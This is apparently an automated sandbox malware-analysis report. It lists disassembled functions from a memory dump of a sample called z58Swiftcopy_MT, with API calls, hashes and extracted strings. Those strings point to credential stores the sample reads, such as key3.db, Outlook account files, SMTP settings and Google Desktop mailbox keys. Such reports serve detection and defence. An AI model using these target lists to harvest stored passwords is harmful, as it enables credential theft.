                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                      • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                                                      Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                                      • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                      • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                                                      Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                                      Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                                                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID: Ul@$key3.db
                                                                                                                                                                                                                                      • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                                      • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                                      • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                                                      Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                                      • String ID: smtp
                                                                                                                                                                                                                                      • API String ID: 2625860049-60245459
                                                                                                                                                                                                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                                      Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                                      Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                                      Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                                                                                                      • API String ID: 714388716-917056472
                                                                                                                                                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                                      Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                                      Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                                      Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                                      • String ID: 3CD
                                                                                                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                                      Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                                      • String ID: Password2
                                                                                                                                                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                                      • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                      • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                                                      Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                                      Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                                      • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                      • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                                                      Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
